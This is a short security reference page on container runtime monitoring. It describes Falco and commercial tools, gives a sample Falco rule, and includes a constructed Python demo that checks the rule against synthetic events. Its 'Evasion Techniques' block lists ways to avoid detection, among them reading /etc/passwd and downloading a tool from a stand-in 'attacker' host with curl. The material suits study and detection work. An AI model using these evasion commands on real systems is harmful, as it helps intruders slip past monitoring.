Runtime Security
Defense
Runtime security tools monitor container behavior for anomalies. Understanding these defenses helps both in testing and evasion.
Runtime Security Tools
Falco
- eBPF-based monitoring
- Syscall-level visibility
- Rule-based detection
- CNCF project
Aqua/Prisma/Sysdig
- Commercial solutions
- Image + runtime protection
- Network policies
- Compliance scanning
Common Detection Rules
```yaml
# Things Falco typically detects:
# - Shell spawned in container
# - Package manager usage (apt, yum)
# - Network connections to unusual ports
# - Write to /etc/ directories
# - Mount of sensitive paths
# - Privilege escalation attempts

# Example Falco rule
- rule: Terminal shell in container
  desc: A shell was used as the entrypoint/exec point
  condition: >
    spawned_process and container
    and shell_procs and proc.tty != 0
  output: >
    Shell spawned in container
    (user=%user.name container=%container.name
    shell=%proc.name parent=%proc.pname)
  priority: WARNING
```
Evasion Techniques
```bash
# Avoid shell detection - use programming language
python3 -c "import os; os.system('id')"
perl -e 'exec "id"'

# Memory-only execution
# Download and run without touching disk

# GTFOBins alternatives to common tools
# Instead of cat:
tac /etc/passwd | tac
# Instead of ls:
echo *

# Avoid package managers
# Upload static binaries instead
curl -o /tmp/tool http://attacker/tool && chmod +x /tmp/tool
```
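As an added example (not from the original page or the Falco project), the rule from the detection section and a hypothetical follow-on rule for the interpreter evasion above are evaluated in Python over constructed process-spawn events; the field names, the `SHELL_PROCS` set and the `INTERPRETERS` set are assumptions standing in for Falco's own macros.

```python
from dataclasses import dataclass

# Constructed process-spawn events modelled on the Falco fields the page's
# rule uses (proc.name, proc.pname, proc.cmdline, proc.tty, container.name, user.name).
@dataclass
class SpawnEvent:
    proc_name: str
    proc_pname: str
    proc_cmdline: str
    proc_tty: int
    container_name: str          # "" when the process runs on the host
    user_name: str = "root"

# Assumed stand-in for Falco's shell_procs macro.
SHELL_PROCS = {"bash", "sh", "zsh", "dash", "ash", "csh", "ksh"}
# Assumed interpreter list covering the inline-code evasion shown on the page.
INTERPRETERS = {"python", "python3", "perl", "ruby", "php", "node"}

def shell_in_container(ev: SpawnEvent) -> bool:
    """The page's rule: spawned_process and container and shell_procs and proc.tty != 0."""
    return bool(ev.container_name) and ev.proc_name in SHELL_PROCS and ev.proc_tty != 0

def interpreter_inline_code(ev: SpawnEvent) -> bool:
    """Hypothetical rule: an interpreter handed code on its command line inside a container."""
    argv = ev.proc_cmdline.split()
    return bool(ev.container_name) and ev.proc_name in INTERPRETERS \
        and any(a in ("-c", "-e") for a in argv[1:])

def evaluate(events):
    """Return (rule name, output line) for every event that matches a rule."""
    rules = [("Terminal shell in container", shell_in_container),
             ("Interpreter inline code in container", interpreter_inline_code)]
    alerts = []
    for ev in events:
        for name, cond in rules:
            if cond(ev):
                alerts.append((name, f"user={ev.user_name} container={ev.container_name} "
                                     f"proc={ev.proc_name} parent={ev.proc_pname}"))
    return alerts

# Constructed sample events.
SAMPLE_EVENTS = [
    SpawnEvent("bash", "runc", "bash", 34816, "web-1"),            # interactive exec: page's rule fires
    SpawnEvent("bash", "sshd", "bash", 34816, ""),                 # host shell: not in a container
    SpawnEvent("sh", "entrypoint.sh", "sh -c nginx", 0, "web-1"),  # no tty: page's rule stays silent
    SpawnEvent("python3", "app", "python3 -c import os; os.system('id')", 0, "web-1"),  # page's evasion
]

if __name__ == "__main__":
    for name, line in evaluate(SAMPLE_EVENTS):
        print(f"{name}: {line}")
```

The third event shows why the page's rule keys on `proc.tty`, and the fourth shows that the interpreter evasion is only caught by the extra rule.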